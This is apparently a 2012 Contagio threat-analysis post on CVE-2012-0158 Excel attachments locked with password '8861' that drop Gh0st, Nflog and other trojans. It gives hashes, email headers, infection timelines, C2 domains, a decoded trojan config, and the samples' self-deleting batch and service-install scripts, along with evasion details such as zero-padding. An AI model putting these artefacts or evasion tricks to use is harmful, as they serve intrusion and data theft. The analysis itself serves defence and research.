contagio: CVE-2012-0158 generated "8861 password" XLS samples and analysis

Symantec recently posted an article by Joji Hamada titled "Password “8861” Used in Targeted Attacks", where the attackers continuously using the same passwords sent in emails together with the malicious attachment. Indeed, the password not only allows to evade detection but also makes it difficult to analyse the exploit itself.

All the samples i have that have this password appear to be created via a generator and share certain similarities. I will point out a few but you can find many more if you analyse the files and payloads.

- Exploit CVE-2012-0158

The hallmark ListView2, 1, 1, MSComctlLib, ListView are clearly seen in the files, as well as excessive calls to MSCOMCTL.OCX during the dynamic analysis.

- Same password

8861 could be the attacker's lucky number, or it is job related, or being a primary number, it plays some role in the RSA encryption implementation in this generator ( this one perhaps is a bit far fetched, but not more than other theories)

- Antivirus/Malware detection

These files are mostly detected as Exploit.D-Encrypted by different AV vendors but this signature detects other malicious password protected documents - it is not limited to this 8861 generator files.

Yara Signatures: You can develop your own yara signatures based on these and other indicators you find in the files. I will share signatures on Yara Signature Exchange Google Group. If you are interested in making and sharing, please see DeepEnd Research: Yara Signature Exchange Google Group
IDS: Emerging threats IDS signatures - see below.

- Same file structure

They are each different sizes and have different payloads, however the first 120KB of each file are identical and are completley different from the headers of other typical user created password protected spreadsheets and other malicious and password protected XLS files. I will post two other malicious messages that were NOT generated using the same generator is seems and have a different password (I don't know password for those two files yet, if your figure it out, please share)

- Same document code page

Windows Simplified Chinese (PRC, Singapore)

- Same name for the dropped files (ews.exe and set.xls)

The dropped payload and the clean XLS document are different sizes, different types of malware for trojans, but have the same names (some are renamed after creation), which suggests a template. The embedded clean XLS documents have different metadata - I guess those were downloaded from internet or stolen from different targets - some were created on the Kingsoft version of Office, different authors, etc.

- Non default encryption (RC4, Microsoft RSA SChannel Cryptographic Provider).

Default is "Office 97/2000 compatible", which I think is 40-bit RC4 encryption. The generator is probably not using Excel interface but has it's own implementation of the encryption for the VBA code.

- Targets do not seem to be related by their occupation

Targets are in different countries - Japan, China, France and do not seem to be related by business or industry - human rights activists, businesses, politicians. This makes me think it is not the same group of attackers but it is just a generator purchased by/supplied to different groups attacking different targets. The same trojan types, C2 domains, and targets were covered on Contagio and other resources earlier.

CVE #

CVE-2012-0158

The (1) ListView, (2) ListView2, (3) TreeView, and (4) TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls in Microsoft Office 2003 SP3, 2007 SP2 and SP3, and 2010 Gold and SP1; Office 2003 Web Components SP3; SQL Server 2000 SP4, 2005 SP4, and 2008 SP2, SP3, and R2; BizTalk Server 2002 SP1; Commerce Server 2002 SP4, 2007 SP2, and 2009 Gold and R2; Visual FoxPro 8.0 SP1 and 9.0 SP2; and Visual Basic 6.0 Runtime allow remote attackers to execute arbitrary code via a crafted (a) web site, (b) Office document, or (c) .rtf file that triggers "system state" corruption, as exploited in the wild in April 2012, aka "MSCOMCTL.OCX RCE Vulnerability."

Download

Download all the Excel files plus payload files for #1 and 2 in a password protected archive (email me if you need the password)

Many thanks to anonymous for sharing. Payload data for other Excel files is coming soon.

Original Message

This is an example of a targeted message for one of the attachments (New Microsoft excel table.xls)

211.174.163.103 - poor reputation, spammer

http://www.projecthoneypot.org/ip_211.174.163.103

Received: from xxxxxxxxxxxxxxxx ([172.25.22.235]) by xxxxxxxxxxxxxxxxxx (xxxxxxxxxxxxx) (using TLSv1/SSLv3 with cipher AES256-SHA (256 bits)) for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

Reply-To: <jiaoguobiao3@sina.com>

Received: from [172.25.18.171] (port=48602 helo=xxxxxxxxxxxx) by smtp-xxxxxxxxxxxxxxxxx with esmtp id 1StwFd-0002R0-KA for xxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

From: <jiaoguobiao3@sina.com>

Sender: <jiaoguobiao3@sina.com>

Received: from [172.25.18.133] (port=14641 helo=xxxxxxxxxxxxxxxxxxx) by xxxxxxxxxxxxxx with smtp id 1StwFd-0006Hi-74 for xxxxxxxxxxxxxxxxxxxx; Wed, 25 Jul 2012 09:43:21 +0200

To: xxxxxxxxxxxxx

Received: from (unknown [172.25.18.172]) by XXXXXXXXXXXX with smtp id XXXXXXXXXXXXX; Wed, 25 Jul 2012 09:43:19 +0200

Received: from [58.63.234.169] (port=26328 helo=mail234-169.sinamail.sina.com.cn) by XXXXXXXXXXXXXX with esmtp id 1StwFY-0000ms-HZ for XXXXXXXXXXX; Wed, 25 Jul 2012 09:43:20 +0200

X-Originating-IP: [211.174.163.103]

X-IronPort-Anti-Spam-Filtered: true

X-IronPort-Anti-Spam-Result: AlEDAKU/KE/TrqNn/3poAAyBUw

Received: from unknown (HELO webmail.sinamail.sina.com.cn) ([10.71.1.38]) by irgz1-219.sinamail.sina.com.cn with ESMTP; 25 Jul 2012 15:43:11 +0800

Received: by webmail.sinamail.sina.com.cn (Postfix, from userid 80) id 52B3F5F8035; Wed, 25 Jul 2012 15:43:11 +0800 (CST)

Date: Wed, 25 Jul 2012 15:43:11 +0800

Received: from jiaoguobiao3@sina.com([211.174.163.103]) by m1.mail.sina.com.cn via HTTP; Wed, 25 Jul 2012 15:43:11 +0800 (CST)

Content-Type: multipart/mixed;

boundary="----=_NextPart_000_001F_01CD6E72.04563CA0";

charset="gb2312"

Subject: Application

MIME-Version: 1.0

X-Priority: 3

X-MSMail-Priority: Normal

X-MessageID: 1343202191.3101.29137

X-Mailer: Sina WebMail 4.0

Message-ID: <20120725074311.52B3F5F8035@webmail.sinamail.sina.com.cn>

X-NAI-Spam-Flag: NO

X-NAI-Spam-Level: *

X-NAI-Spam-Threshold: 7

Importance: Normal

X-NAI-Spam-Score: 1.2

X-NAI-Spam-Report: 3 Rules triggered* 1 -- BODY_ONE_LINE_ATTACH_ONLY* 0.2 -- GEN_SPAM_FEATRE* 0 -- RV4289

X-NAI-Spam-Version: 2.2.0.9309 : core <4289> : streams <790053> : uri <1174304>

X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.6157

211.174.163.103

Host reachable, 265 ms. average

211.174.128.0 - 211.174.255.255

ELIMNET, INC.

Korea, Republic of

IP Administrator

Choongjungno3-Ka Seodaemoon-Gu

Elimnet Bldg, 32-11

phone: +82-2-3149-4923

noc@elim.net

File Information

"8861 GENERATOR" FILES (payload in some cases gets immediately renamed upon creation)

1. New Microsoft excel table.xls or 情况表.xls

Clean decoy set.xls: blank.

Message target: French Government and Chinese individuals

Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d dropper for Gh0st trojan (not sure about the name)

SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm

9E82BA53F3D26E04207064ED8BDAA44A

2. qȐ}(24.7.1).xls

Clean decoy set.xls: a document related to Japanese manufacturing

Payload ews.exe: 0612B3138179852A416379B3E85742EA dropper for Trojan Nflog (see Contagio for the same trojan)

SSDeep:

3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR

46AC122183C32858581E95EF40BD31B3

3. 240727.xls

Clean decoy set.xls: a Japanese document

Payload ews.exe: 63d7ad4f9a5e8ede0218bad6e8d5c2e6 dropper for Trojan Taidoor (see Contagio for the same trojan)

SSDeep 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/nGpOiz3EX:dbL6vr7ZtpxBbi636Ls0b6P4O4K

7A0D5BB0CA9992826BAD0B2241C4992B

4. 8D823C0A3DADE8334B6C1974E2D6604F.xls

Clean decoy set.xls: a Japanese document

Payload ews.exe: 49F721DCA02C8F996C267DE26E2AA70C dropper for Trojan Nflog (see Contagio for the same trojan)

SSdeep: 3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/tGlbwwQJLsD4/D6E:dbL6vr7ZtpxBbi636Ls0b6HLLs0b6E

8D823C0A3DADE8334B6C1974E2D6604F

5. 2012日本外交の目標 The goal of Japan's diplomacy

Clean decoy set.xls: a Japanese document

Payload ews.exe e750d80055c38747aac5ac91bc0bd29d dropper for Trojan PoisonIvy

SSDeep 6144:dbL6vr7ZtpxBbi636Ls0b64/gbhwD/nv/LMezJUJwf:dbL6zdPxBb56LPzoa7nHLMezJUJG

6BB32CE95FBFAADAD19212080ED0268B

6. Seminiar.xls

Message target and set.xls: human rights activists in China

Payload ews.exe: dropper for Trojan RAT Lurk read about Lurk here http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf)

MD5 and sample currently unavailable

==============================

"NON - 8861" FILES for comparison - presumably malicious. Password unknown.

a .Dharamsala August 2012 Full program.xls 971f99af0f9df674a79507ed7b3010fb

b. EIDHR_action_plan.xlsx 0fe550a5d1187d38984c505ef7741638

Payload details

Kingsoft office metadata in the clean decoy file

# 1
1. New Microsoft excel table.xls or 情况表.xls

Clean decoy set.xls: blank.

Message target: French Government and Chinese individuals

Payload ews.exe: b1d09374006e20fa795b2e70bf566c6d dropper for Gh0st trojan (correct me if I am wrong)

SSDeep: 6144:dbL6vr7ZtpxBbi636Ls0b6HKqtAFCOjjBXa9/hcp8Rm:dbL6zdPxBb56LPDXa9/hiAm

9E82BA53F3D26E04207064ED8BDAA44A

File: iexplore.exe Size: 123932 MD5: b1d09374006e20fa795b2e70bf566c6d (VT 1/42)
File: set.xls Size: 7168 MD5: 726708CA086BF952266FADB9D655022D
File: srvlic.dll Size: 8704 MD5: 4a886c0f6e2c578207c2e26f9e452fae (VT 0/42)
File: keybyd.dat Size: 32768 MD5: 071cc2261ebcf789a447317778cdf048(VT 1/42)
File: Del.bat Size: 267 MD5: 12952BA491F972210EAB536942EB5075
File: syslog.dat Size: 1647 MD5: D1F2D54118CB4EB488A1340367E23268

Timeline and generated files.

file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\Excel8.0\MSComctlLib.exd
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\set.xls
file Write C:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE -> %Temp%\ews.exe
file Write %Temp%\ews.exe -> %Application Data%\iexplore.exe
file Write %Temp%\ews.exe -> %Temp%\Del.bat
file Write %Temp%\ews.exe -> C:\WINDOWS\system32\srvlic.dll
file Write %Temp%\ews.exe -> %Temp%\keybyd.dat
file Write C:\WINDOWS\system32\cmd.exe - > \deleted_files\Del.bat
file Write %Application Data%\iexplore.exe -> %Temp%\syslog.dat
process terminated C:\WINDOWS\system32\cmd.exe -> ..OFFICE11\EXCEL.EXE
iexplore.exe gets renamed to text.dat

File strings and system calls suggest it is a version of Gh0st rat with keylog

Read here McAfee - Anatomy of a Gh0st Rat
Gh0st 3.6 source code (go up the path to see other files)

http://read.pudn.com/downloads112/sourcecode/delphi_control/470224/Server/svchost/common/KernelManager.cpp__.htm

%temp%Loop_KeyboardManager%temp%\keybyd.datLoop_HookKeyboard

Mutexes
Mutant Name Process Name Process ID
ShimCacheMutex iexplore.exe 1348 (iexplore.exe)
MutexObject iexplore.exe 1348 (iexplore.exe)

Registry change Created key

LOCAL MACHINE\SYSTEM\CurrentControlSet\Control\MediaResources\msvideo

File: Del.bat Size: 267 MD5: 12952BA491F972210EAB536942EB5075
Local Settings\Temp\Del.bat

noDesKfile

echo %time%>NUL

move "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" C:\DOCUME~1\Laura\LOCALS~1\Temp\test.dat

if exist "C:\DOCUME~1\Laura\LOCALS~1\Temp\ews.exe" goto noDesKfile

del %0 && "C:\Documents and Settings\Laura\Application Data\iexplore.exe"

File: syslog.dat MD5: d1f2d54118cb4eb488a1340367e23268 Size: 1647

Ascii Strings:

--------------

ohPRSPORZORWBPQXV[XW[B1

KohohPRSPORZORWBPQXWRXPRB1

KohohPRSPORZORWBPQXWPXRZB1

Traffic (Download pcap here)

lixht.gnway.net
121.63.150.15
China
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK
netuser.dns1.us 27.22.117.26
China
AS4134 Chinanet
CHINANET HUBEI PROVINCE NETWORK

Historical data for these domains/IPS
first seen 2012-05-21 13:39:03 -0000
last seen 2012-05-21 13:39:03 -0000
netuser.dns1.us. A 111.177.86.236

first seen 2012-05-16 15:24:25 -0000
last seen 2012-05-17 07:18:15 -0000
netuser.dns1.us. A 111.177.86.240

#2

2. qȐ}(24.7.1).xls

Clean decoy set.xls: a document related to Japanese manufacturing

Payload ews.exe: 0612B3138179852A416379B3E85742EA dropper for Trojan Nflog (see Contagio for the same trojan)

SSDeep:

3072:dbT46lL8vAyt1BIq5OO0ME+5pU5QDBbi2D36LsD4/D63/NB0C1jlEWHsOR:dbL6vr7ZtpxBbi636Ls0b6V6JWMOR

46AC122183C32858581E95EF40BD31B3

Trojan Nflog was covered more than once before on Contagio and other sources. ET signatures exist for the traffic patterns http://lists.emergingthreats.net/pipermail/emerging-sigs/2012-February/017394.html.
The trojan collects all system logs and data and uploads them to C2 server in a very verbose form as you see below.

List of files

File: iexpl001.tmp Size: 25600 MD5: 0612B3138179852A416379B3E85742EA - main dropper
File: NfIpv6.ocx Size: 15360 MD5: D9A5A885E2A90088B7F94E094697A932
File: iexp.bat Size: 155 MD5: 61B07E9565745DFFE72C759BB8227B58
File: YahooCache.ini Size: 165 MD5: 1F38834AC81A382C22777C7A27432328 - config file
File: $NtUninstallKB942388$ MD5: c7a6c3a3bf556b011a4d40224e83d43d - system data
File: MSMAPI.OCX Size: 67072 MD5: A3D3B0686E7BD13293AD0E63EBEC67AF
File: CAServer.exe Size: 62976 MD5: 4FB872E0D0FC1A016C93C573A976D85D dropper for the backdoor service installer
File: ~mcd.dat Size: 0
File: IntelAMTPP.dll Size: 10485760 MD5: EBD1F5E471774BB283DE44E121EFA3E5 - backdoor service installer
File: Nfile.asp Size: 67080 MD5: 2866C12CE666D6B15FC6E32D968BA57B - downloaded binary - there is an 8 byte padding ( 36 37 30 37 32 00 D3 77 ) before the PE header, remove it and you get MD5: A3D3B0686E7BD13293AD0E63EBEC67AF - the main NFlog trojan

Abbreviated timeline and created files - including activities during stage 2 of the attack - Note the 2nd stage starts more than an hour after the infection

6/8/2012 1:43:22.142,"file","Write"	.\OFFICE11\EXCEL.EXE	->	\Local Settings\Temporary Internet Files\Content.MSO\E207C016.emf
6/8/2012 1:43:23.596,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\Excel8.0\MSComctlLib.exd
6/8/2012 1:43:37.830,"process","created"	%Temp%\ews.exe	->	\system32\cmd.exe
6/8/2012 1:43:32.486,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\set.xls
6/8/2012 1:43:32.549,"file","Write"	.\OFFICE11\EXCEL.EXE	->	%Temp%\ews.exe (gets renamed to iexpl001.tmp)
6/8/2012 1:43:33.190,"file","Write"	%Temp%\ews.exe	->	C:\WINDOWS\Temp\NfIpv6.ocx
6/8/2012 1:43:33.299,"file","Write"	%Temp%\ews.exe	->	C:\WINDOWS\Temp\YahooCache.ini
6/8/2012 1:44:3.987,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\Documents and Settings\NetworkService\IETldCache\index.dat
6/8/2012 1:44:13.81,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\MSMAPI.OCX
6/8/2012 1:44:15.97,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:15.378,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 1:44:15.972,"process","terminate	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:15.972,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\$NtUninstallKB942388$
6/8/2012 1:44:16.3,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 1:44:16.238,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\net.exe
6/8/2012 1:44:16.550,"process","created"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 1:44:17.128,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\tasklist.exe
6/8/2012 1:44:17.378,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\wbem\wmiprvse.exe
6/8/2012 1:44:18.394,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\systeminfo.exe
6/8/2012 1:44:22.878,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\netstat.exe
6/8/2012 1:45:21.925,"process","terminate	C:\WINDOWS\system32\svchost.exe	->	\system32\wbem\wmiprvse.exe
STAGE 2
6/8/2012 2:59:34.664,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\Temp\MyTmpFile.Dat
6/8/2012 3:0:22.994,"file","Write"	C:\WINDOWS\system32\systeminfo.exe	->	C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:9.255,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:21.709,"file","Write"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\Temp\~mcd.dat
6/8/2012 3:7:21.740,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:45.976,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:46.116,"process","created"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:48.257,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\Program Files\Common Files\Driver\IntelAMTPP.dll
6/8/2012 3:7:51.351,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:51.366,"process","created"	C:\WINDOWS\CAServer.exe	->	\system32\cmd.exe
6/8/2012 3:7:51.538,"file","Write"	C:\WINDOWS\CAServer.exe	->	C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:51.616,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:51.820,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\rundll32.exe
6/8/2012 3:7:51.945,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\attrib.exe
6/8/2012 3:7:52.288,"file","Write"	C:\WINDOWS\system32\cmd.exe.	->	.\deleted_files\C\WINDOWS\CAServer.exe
6/8/2012 3:7:52.288,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\CAServer.exe
6/8/2012 3:7:52.351,"file","Write"	C:\WINDOWS\system32\cmd.exe.	->	.\deleted_files\C\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.351,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\WINDOWS\Temp\iexp.bat
6/8/2012 3:7:52.820,"process","created"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 3:7:52.945,"file","Write"	System	->	C:\PROGRA~1\COMMON~1\Driver\init.bat
6/8/2012 3:7:52.945,"file","Write","System	System	->	..\deleted_files\C\WINDOWS\CAServer.exe"
6/8/2012 3:7:53.54,"process","created"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:53.242,"process","created"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 3:7:53.945,"file","Write"	System	->	..\deleted_files\C\WINDOWS\Temp\iexp.bat"
6/8/2012 3:7:54.38,"process","terminated"	C:\WINDOWS\system32\cmd.exe	->	\system32\ipconfig.exe
6/8/2012 3:7:54.85,"process","terminated"	C:\WINDOWS\system32\svchost.exe	->	\system32\cmd.exe
6/8/2012 3:7:55.38,"process","terminated"	C:\WINDOWS\system32\net.exe	->	\system32\net1.exe
6/8/2012 3:7:55.54,"process","terminated"	C:\WINDOWS\system32\cmd.exe	->	\system32\net.exe
6/8/2012 3:7:55.70,"file","Write"	C:\WINDOWS\system32\cmd.exe	->	..\deleted_files\C\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.70,"file","Delete"	C:\WINDOWS\system32\cmd.exe	->	C:\Program Files\Common Files\Driver\init.bat
6/8/2012 3:7:55.101,"process","terminated"	C:\WINDOWS\CAServer.exe	->	\system32\cmd.exe
6/8/2012 3:7:55.945,"file","Write",	System	->	..\deleted_files\C\Program Files\Driver\init.bat"
6/8/2012 3:7:58.320,"file","Write"	C:\WINDOWS\system32\svchost.exe	->	%Local Settings%\Temporary Internet Files\Content.IE5\BWHA22TU\ct_datangcun_com[1]

Registry change - installation of WmdmPmSp service - more than an hour after the infection

Key Name: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSpData: Windows Infrared Port Monitor.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wmdm
Last Write Time: 8/6/2012 - 3:07 AMC:\Progra~1\common~1\Driver\IntelAMTPP.dll

File: iexpl001.tmp Size: 25600 MD5: 0612B3138179852A416379B3E85742EA

ASCI strings

00000162
\temp\
NfIpv6.ocx
SOFTWARE\MICROSOFT\Windows\CurrentVersion\Run
wmiprivse.exe
net start IPRIP
sc start iprip 'cmd' 1
/A /C
NfIpv6.ocx,RundllInstallA IPRIP
/A /C rundll32
ComSpec
cmd.exe
MSMAPI.OCX,RunProcGoA
MSMAPI.OCX
NfIpv6.ocx,RunInstallA
rundll32.exe
YahooCache.ini

File: YahooCache.ini Size: 165 MD5: 1F38834AC81A382C22777C7A27432328
Config file
[cpar]

m_ID=KH120719new*
m_Proc=SVCHOST.EXE
m_MainUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_BackUrl=d3d3Lm1saXRqY2FiLmNvbQ==
m_DllName=TVNNQVBJLk9DWA==
isFirst=notFirst

Bease64 encoded data in the config file

TVNNQVBJLk9DWA== MSMAPI.OCX d3d3Lm1saXRqY2FiLmNvbQ==www.mlitjcab.com

File: MSMAPI.OCX Size: 67072 MD5: A3D3B0686E7BD13293AD0E63EBEC67AF
ASCI strings

No cmd Info!0000000000000000000000000000000000000000%s:%d\cmd.exe /C dir "%userprofile%\recent\"net viewnetstat -ansysteminfotasklistnet startipconfig /all255.255.255.0AuthPortcparAddress\temp\YahooCache.inim_IDm_MainUrl

1000501C: 'SvcHostDLL.exe',0
10005050: 'RegSetValueEx(ServiceDll)',0
1000506C: 'ServiceDll',0
10005078: 'Parameters',0
10005084: 'RegCreateKeyA',0
10005094: 'Advapi32',0
100050A0: 'SYSTEM\CurrentControlSet\Services\',0
100050C4: 'Net address translation for IPv6 Protocol.',0
100050F0: 'IPv6 Stack Local Support',0
1000510C: '%SystemRoot%\System32\svchost.exe -k netsvcs',0
1000513C: 'netsvcs',0
10005144: 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',0
1000517C: 'IPRIP',0
10005184: 'NfIpv6.ocx',0
10005190: 'NfcoreOk',0
1000519C: 'm_Proc',0
100051A4: 'm_DllName',0
100051B0: 'm_MainUrl',0
100051BC: 'm_BackUrl',0
100051C8: 'cpar',0
100051D0: 'm_ID',0
100051D8: 'YahooCache.ini',0
100051E8: 'NfLog/Nfile.asp',0
100051F8: 'GetFile',0
10005200: 'ProcGo',0
10005208: 'HTTP/1.1',0
10005214: 'Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1)',0
10005248: '%s:%d',0
10005250: 'Auth',0
10005258: 'Port',0
10005260: 'Address',0
1000526C: '\Temp\',0
10005274: 'InternetSetOptionA',0
10005288: 'InternetReadFile',0
1000529C: 'InternetOpenA',0
100052AC: 'InternetConnectA',0
100052C0: 'InternetCloseHandle',0
100052D4: 'HttpSendRequestA',0
100052E8: 'HttpQueryInfoA',0
100052F8: 'HttpOpenRequestA',0
1000530C: 'HttpEndRequestA',0
1000531C: 'wininet.dll',0
10005334: 'www.microsoft.com',0
10005350: 'Proxy-Authorization: Basic ',0
1000536C: 'HTTP://',0
10005374: 'HEAD',0
1000537C: 'POST',0

File: $NtUninstallKB942388$ MD5: c7a6c3a3bf556b011a4d40224e83d43d Size: 8591 - full systeminfo dump

Ascii Strings:
---------------------------------------------------------------------------
C:\WINDOWS\system32\ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : DellXT
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : localdomain
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
Physical Address. . . . . . . . . : 00-50-56-3C-F6-41
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.106.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.106.2
DHCP Server . . . . . . . . . . . : 192.168.106.254
DNS Servers . . . . . . . . . . . : 192.168.106.2
Primary WINS Server . . . . . . . : 192.168.106.2
Lease Obtained. . . . . . . . . . : Monday, August 06, 2012 1:32:20 AM
Lease Expires . . . . . . . . . . : Monday, August 06, 2012 2:02:20 AM
C:\WINDOWS\system32\net start
These Windows services are started:
Application Layer Gateway Service
Bluetooth Support Service
COM+ Event System
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
DNS Client
Error Reporting Service
ESET Service
Event Log
[abbreviated]-----------------
Windows User Mode Driver Framework
Wireless Zero Configuration
Workstation
The command completed successfully.
C:\WINDOWS\system32\tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 240 K
smss.exe 552 Console 0 388 K
csrss.exe 624 Console 0 2,816 K
winlogon.exe 648 Console 0 3,128 K
[abbreviated]---------------
TPAutoConnect.exe 968 Console 0 4,528 K
ctfmon.exe 224 Console 0 3,044 K
cmd.exe 1056 Console 0 92 K
EXCEL.EXE 368 Console 0 11,640 K
cmd.exe 940 Console 0 2,316 K
tasklist.exe 276 Console 0 3,972 K
wmiprvse.exe 1468 Console 0 5,384 K
C:\WINDOWS\system32\systeminfo
Host Name: DELLXT
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 2 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: admin
Registered Organization:
Product ID: 76487-641-3817835-23453
Original Install Date: 11/15/2011, 9:24:04 AM
System Up Time: 28 Days, 1 Hours, 5 Minutes, 19 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 26 Stepping 5 GenuineIntel ~2660 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-05:00) Eastern Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 752 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use: 40 MB
Page File Location(s): C:\pagefile.sys
Domain: WUC
Logon Server: N/A
Hotfix(s): 3 Hotfix(s) Installed.
[01]: File 1
[02]: Q147222
[03]: KB911164 - Update
NetWork Card(s): 1 NIC(s) Installed.
[01]: VMware Accelerated AMD PCNet Adapter
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 192.168.106.254
IP address(es)
[01]: 192.168.106.141
C:\WINDOWS\system32\netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
TCP 127.0.0.1:5152 127.0.0.1:1036 CLOSE_WAIT
TCP 192.168.106.141:139 0.0.0.0:0 LISTENING
TCP 192.168.106.141:1065 64.4.11.42:80 ESTABLISHED
TCP 192.168.106.141:1066 112.175.245.222:80 ESTABLISHED
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1032 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1900 *:*
UDP 192.168.106.141:123 *:*
UDP 192.168.106.141:137 *:*
UDP 192.168.106.141:138 *:*
UDP 192.168.106.141:1900 *:*
C:\WINDOWS\system32\net view
System error 6118 has occurred.
The list of servers for this workgroup is not currently available
C:\WINDOWS\system32\dir "%userprofile%\recent\"
The system cannot find the file specified.

Unicode Strings:

File: init.bat Size: 123 MD5: 729865A05053FC1A447694A6A6B943A1

@Echo off
rundll32.exe C:\Progra~1\common~1\Driver\IntelAMTPP.dll,RundllInstall WmdmPmSp
net start WmdmPmSp
del %0

File: iexp.bat Size: 155 MD5: 61B07E9565745DFFE72C759BB8227B58
@echo off
:selfkill
attrib -a -r -s -h "c:\windows\CAServer.exe"
del "c:\windows\CAServer.exe"
if exist "c:\windows\CAServer.exe" goto selfkill
del %0

\File: IntelAMTPP.dll Size: 10485760 MD5: EBD1F5E471774BB283DE44E121EFA3E5
This file is padded with zeros to 10MB to evade detection. I saw files padded up to 22-25 mb to avoid uploads to Virtustotal.

10006210: 'USER32.dll',0
10006220: 'ADVAPI32.dll',0
10006240: 'WININET.dll',0
10006250: 'iphlpapi.dll',0
10006260: 'WS2_32.dll',0
